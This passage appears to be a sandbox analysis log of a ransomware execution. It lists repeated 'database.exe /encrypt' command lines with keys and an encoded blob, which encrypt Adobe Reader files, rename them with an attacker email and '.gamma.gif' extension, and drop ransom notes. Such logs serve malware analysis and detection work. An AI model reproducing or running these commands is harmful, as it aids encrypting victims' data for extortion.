"+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5328
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 2486⤵
- Program crash
PID:7372
-
-
C:\Windows\SysWOW64\Shell.exe"C:\Windows\system32\Shell.exe"6⤵PID:7376
-
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDXFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4808
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\Restore-My-Files.txt"5⤵PID:3576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2486⤵
- Program crash
PID:796
-
-
C:\Windows\SysWOW64\Shell.exe"C:\Windows\system32\Shell.exe"6⤵PID:6024
-
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2580
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2472
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\XDPFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4172
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#Decrypt_Files_ReadMe#.rtf.gif"5⤵PID:2496
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:5984
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4740
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6856
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:1136
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4972
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\Restore-My-Files.txt"5⤵PID:3924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 2486⤵
- Program crash
PID:7328
-
-
C:\Windows\SysWOW64\Shell.exe"C:\Windows\system32\Shell.exe"6⤵PID:7356
-
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6084
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:2448
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:2828
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6412
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:3244
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
PID:4132 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 2486⤵
- Program crash
PID:2952
-
-
C:\Windows\SysWOW64\Shell.exe"C:\Windows\system32\Shell.exe"6⤵PID:5844
-
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7004
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:4352
-
-
